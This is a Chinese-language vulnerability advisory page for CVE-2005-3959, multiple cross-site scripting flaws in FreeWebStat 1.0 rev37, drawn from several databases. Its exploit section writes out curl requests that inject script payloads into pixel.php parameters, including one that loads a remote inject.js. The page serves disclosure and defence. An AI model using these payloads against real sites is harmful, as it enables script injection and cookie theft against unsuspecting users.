CVE-2005-3959
CVSS4.3
发布时间 :2005-12-01 01:03:00
修订时间 :2011-03-07 21:27:26
NMCOS    

[原文]Multiple cross-site scripting (XSS) vulnerabilities in FreeWebStat 1.0 rev37 allow remote attackers to inject arbitrary web script or HTML via the (1) site, (2) jsref, (3) jsres, and (4) jscolor parameters to pixel.php, which are not sanitized before being included in the logdb.html file, and (5) the search key to stat.php.


[CNNVD]FreeWebStat多个跨站脚本攻击漏洞(CNNVD-200512-009)

        FreeWebStat 1.0 rev37存在多个跨站脚本攻击漏洞。 远程攻击者可以借助纳入pixel.php之前未净化的对pixel.php的(1) site, (2) jsref, (3) jsres, 和 (4) jscolor 参数,以及(5) 对stat.php的检索关键字,注入任意的Web脚本或HTML。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3959
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3959
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-009
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/2646
(UNKNOWN)  VUPEN  ADV-2005-2646
http://www.ush.it/2005/11/25/free-web-stat/
(VENDOR_ADVISORY)  MISC  http://www.ush.it/2005/11/25/free-web-stat/
http://www.securityfocus.com/bid/15601
(UNKNOWN)  BID  15601
http://www.securityfocus.com/archive/1/archive/1/417902/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051128 Free Web Stat Multiple XSS Vulnerabilities
http://www.freewebstat.com/changelog-english.html
(UNKNOWN)  MISC  http://www.freewebstat.com/changelog-english.html
http://secunia.com/advisories/17783
(VENDOR_ADVISORY)  SECUNIA  17783
http://xforce.iss.net/xforce/xfdb/23391
(UNKNOWN)  XF  freewebstat-stat-search-xss(23391)
http://xforce.iss.net/xforce/xfdb/23387
(UNKNOWN)  XF  freewebstat-logdb-xss(23387)
http://www.osvdb.org/21207
(UNKNOWN)  OSVDB  21207
http://securitytracker.com/id?1015301
(UNKNOWN)  SECTRACK  1015301

- 漏洞信息

FreeWebStat多个跨站脚本攻击漏洞
中危 跨站脚本
2005-12-01 00:00:00 2005-12-01 00:00:00
远程  
        FreeWebStat 1.0 rev37存在多个跨站脚本攻击漏洞。 远程攻击者可以借助纳入pixel.php之前未净化的对pixel.php的(1) site, (2) jsref, (3) jsres, 和 (4) jscolor 参数,以及(5) 对stat.php的检索关键字,注入任意的Web脚本或HTML。

- 公告与补丁

        

- 漏洞信息

21207
FreeWebStat pixel.php Multiple Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

FreeWebStat contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'site', 'jsref', 'jsres', and 'jscolor' variables upon submission to the pixel.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2005-11-28 2005-11-25
2005-11-28 Unknow

- 解决方案

Upgrade to version 1.1 rev0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

FreeWebStat Multiple Cross-Site Scripting Vulnerabilities
Input Validation Error 15601
Yes No
2005-11-28 12:00:00 2005-11-28 12:00:00
Francesco Ongaro is credited with the discovery of this vulnerability.

- 受影响的程序版本

FreeWebStat FreeWebStat 1.0 rev37

- 漏洞讨论

FreeWebStat is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.

FreeWebStat version 1.0 rev37 is reported to affected; other versions may also be vulnerable.

- 漏洞利用

No exploit is required.

curl "http://www.example.com/fws/pixel.php"
domain=<script>alert(1)</script>
&site=<script>alert(2)</script>
&jsref=<script>alert(3)</script>
&jsres=<script>alert(4)</script>
&jscolor=<script>alert(5)</script>?
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www.example.com"

curl "http://www.example.com/fws/pixel.php"
domain=ush.it&site=aa&jsref=http://www.example.com&jsres=1337&jscolor=red?
-e "http://www.example.com/search?q=lello+splendor++&hl=it&lr=&start=
10&sa=N?
-A "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1; SV1; (R1 1.3))"

curl "http://www.example.com/fws/pixel.php"
domain=www.example.com&site=aa&jsref=http://www.example.com&jsres=13
37&jscolor=red? -e "http://www.example.com"
-A "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

curl "http://www.example.com/fws/pixel.php"
domain=<script>alert(1)</script>&site=
<script>alert(2)&jsref=</script><script>alert(3)</script>
&jsres=<script>alert(4)</script>&jscolor=
<script>alert(5)</script>?
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www.example.com"


curl http://www.example.com/fws/pixel.php?site=
&jsres=&jscolor=&jsref=http://www.example.com/search?
q=ppoopp<script language=?javascript?-src=
"http://www.example.com/fws/inject.js?></script>&hl=it"

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站